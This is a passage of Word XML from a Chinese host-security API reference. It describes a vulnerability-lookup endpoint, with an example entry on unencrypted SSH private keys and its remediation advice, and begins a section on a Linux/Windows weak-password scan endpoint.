        <w:t>/external/api/vul/app/linux/5b3a8b567d761b22befc8e16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF0514D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406BA79A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "vulId": "QT032016001411",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "vulName": "SSH服务用户home目录中存在未加密私钥",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "severity": 3,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "apps": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "SSH"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "desc": "默认情况下在用户的home目录中存储的未加密私钥，一旦该服务器被入侵，则可能导致该私钥泄露。私钥是登录服务器的重要凭证，如果私钥被攻击者利用，可通过私钥进行ssh登录认证获取系统权限，带来不可预知的高危风险。",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "restartOpts": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "publicDate": "2016-12-02 00:00:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "checkInfo": "检查所有用户home目录下是否存在未加密私钥",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "checkResult": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "remedDesc": "删除对应的私钥，若已经使用过该私钥对应的公钥进行登录，则应注意更换所有使用该公钥的主机的密钥",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "refs": ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "firstCheckTime":"2016-12-02 00:00:00"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D09945C"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600"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="5555"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4F1151B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38D9052" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18E68038" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DD1A382" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E7A90C9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0288CFA4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66782255" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>vulId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29C9FCB5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44F07FD3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="596493D9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="099F044F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="559277F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>vulName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F10C061" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70B139EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A08407E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="365E8293" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3474F8B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0675FF77" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77D6252F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D5D7BAD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>危险程度：0-信息；1-低危；2-中危；3-高危；4-危急</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6A31F437" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62C41C70" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1883E921" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="179354CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A29370F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>影响的应用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7DF3398D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1972E3E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>desc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="679E13C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36695A43" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02B89330" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3F51A4B3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76F3E15D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>restartOpts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0519A965" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44843DDD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20462DA4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>重启选项：0-未知；1-无需重启；；2-服务重启；3-系统重启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4DBF9E2A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A2842BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>publicDate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35953317" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37D5B872" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D11C502" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>发布时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="58CAC8F5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B239330" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>checkInfo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ED281CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CC9E4B1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="485750FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>验证信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="65E3D2C1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="768C510B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>checkResult</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="000DFE5F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33E4413A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56A7292F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>验证结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6DFAFB7C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7019186B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remedDesc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DCAA6B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3269F52C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25EF7227" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>修复建议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6564ED75" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="508EC286" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>refs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FC97FE6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="403C5FA4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(2048)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="672DDC2F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>引用信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4AEA7CA5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BF6A167" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>firstCheckTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F9AEEF1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25CD7D94" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57574B24" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>首次检测出该风险的时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="20BC943E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="linuxwindows弱密码"/>
      <w:bookmarkEnd w:id="96"/>
      <w:bookmarkEnd w:id="100"/>
      <w:r>
        <w:t>Linux/Windows弱密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8FE13E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供Linux和Windows弱密码的检测和查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C0F5BF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="风险扫描-2"/>
      <w:r>
        <w:t>风险扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA05B5A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于请求主机信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDD8A06" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7404EB9B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/vul/ weakpwd/{linux|win}/check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCF9AEE"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497C54" w14:paraId="7B783D7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677A5F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17266779" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="375C3AAA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68435DF4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4A7904A3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EDA1628" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F90CAFC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10C7DFD8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EE32115" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0/1/2 全部主机/agent范围/业务组范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0DE04CE7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FB3AB2C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4ABA752D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E2E100B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>如果type为1 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="782A67E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机agentId数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="03335107" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70F300DF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35756BBD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74B30DE5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>如果type为2 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1428FB09" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组id范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="62B83B54" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
